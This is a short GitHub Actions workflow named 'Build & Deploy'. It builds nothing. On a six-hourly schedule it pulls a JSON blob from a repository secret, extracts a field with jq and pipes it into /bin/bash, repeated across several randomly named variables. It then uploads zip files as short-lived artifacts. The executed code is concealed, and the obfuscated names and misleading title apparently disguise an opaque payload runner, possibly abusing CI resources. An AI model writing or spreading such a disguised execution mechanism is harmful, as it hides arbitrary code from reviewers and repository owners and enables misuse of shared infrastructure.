name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '39 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          nrt56: ${{ secrets.nrt56 }}
        run: |
          printf '%s' "$nrt56" | jq -r .c1 | /bin/bash
          echo $kfn48985 | jq -r .emg8155 | /bin/bash
          printf '%s' "$l0" | jq -r .rg05718 | /bin/bash
          printf '%s' "$j35" | jq -r .puzh86582 | /bin/bash
          printf '%s' "$n43350" | jq -r .vgkbw21039 | /bin/bash
          echo $nu5 | jq -r .xn28970 | /bin/bash
          printf '%s' "$gjkd4" | jq -r .htus93950 | /bin/bash
          printf '%s' "$tcc286" | jq -r .mxyzc2 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: BWTIlosT
          path: "*.zip"
          retention-days: 1
